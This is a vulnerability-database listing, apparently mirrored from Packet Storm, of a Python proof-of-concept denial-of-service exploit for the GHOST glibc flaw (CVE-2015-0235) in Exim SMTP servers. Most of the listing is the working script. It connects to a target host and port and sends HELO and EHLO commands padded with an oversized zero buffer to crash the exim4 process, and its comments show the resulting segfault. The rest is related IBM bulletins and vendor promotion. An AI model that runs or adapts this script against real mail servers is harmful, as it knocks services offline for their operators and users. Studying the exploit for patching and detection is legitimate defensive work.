Lucene search

K

Exim ESMTP GHOST Denial Of Service

🗓️ 29 Jan 2015 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 93 Views

PoC exploit script for GHOST vulnerability in Exim SMTP causing denial of service crash.

Show more
Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects IBM PureApplication System (CVE-2015-0235)
15 Jun 201807:02
ibm
IBM Security Bulletins
Security Bulletin: Vulnerability in GNU C library (glibc) affects SmartCloud Provisioning 2.1 for IBM Provided Software Virtual Appliance (CVE-2015-0235)
17 Jun 201822:30
ibm
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Mobile (CVE-2015-0235)
16 Jun 201821:22
ibm
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects IBM MessageSight (CVE-2015-0235)
17 Jun 201815:12
ibm
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects the Intel MPSS for use on the Intel Xeon Phi 3120A, Intel Xeon Phi 5110P, Intel Xeon Phi 7120A and Intel Xeon Phi 7120P PCI-Express add-in cards sold by IBM/Lenovo
31 Jan 201901:45
ibm
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects InfoSphere Guardium BM InfoSphere Guardium (CVE-2015-0235)
16 Jun 201821:28
ibm
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects IBM Hyper-Scale Manager Virtual Appliance (CVE-2015-0235)
18 Jun 201800:09
ibm
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects IBM System Storage Storwize V7000 Unified (CVE-2015-0235)
18 Jun 201800:09
ibm
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects IBM DataPower Gateway appliances (CVE-2015-0235)
15 Jun 201807:02
ibm
IBM Security Bulletins
Security Bulletin: GNU C library (glibc) vulnerability affects DS8000 (CVE-2015-0235)
24 May 202217:06
ibm
Rows per page
`The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash.  
  
#!/usr/bin/python  
# Exim ESMTP DoS Exploit by 1N3 v20150128  
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow  
# http://crowdshield.com  
#  
# USAGE: python ghost-smtp-dos.py <ip> <port>  
#  
# Escape character is '^]'.  
# 220 debian-7-7-64b ESMTP Exim 4.80 ...  
# HELO  
# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
# Connection closed by foreign host.  
#  
# user () debian-7-7-64b:~$ dmesg  
# ...  
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in  
# libc-2.13.so[7fabef2a2000+182000]  
  
import socket  
import time  
import sys, getopt  
  
def main(argv):  
argc = len(argv)  
  
if argc <= 1:  
print "usage: %s <host>" % (argv[0])  
sys.exit(0)  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
buffer = "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"  
  
target = argv[1] # SET TARGET  
port = argv[2] # SET PORT  
  
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"  
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
connect=s.connect((target,int(port)))  
data = s.recv(1024)  
print "CONNECTION: " +data  
s.send('HELO ' + buffer + '\r\n')  
data = s.recv(1024)  
print "received: " +data  
s.send('EHLO ' + buffer + '\r\n')  
data = s.recv(1024)  
print "received: " +data  
s.close()  
  
main(sys.argv)  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
29 Jan 2015 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.974
93
.json
Report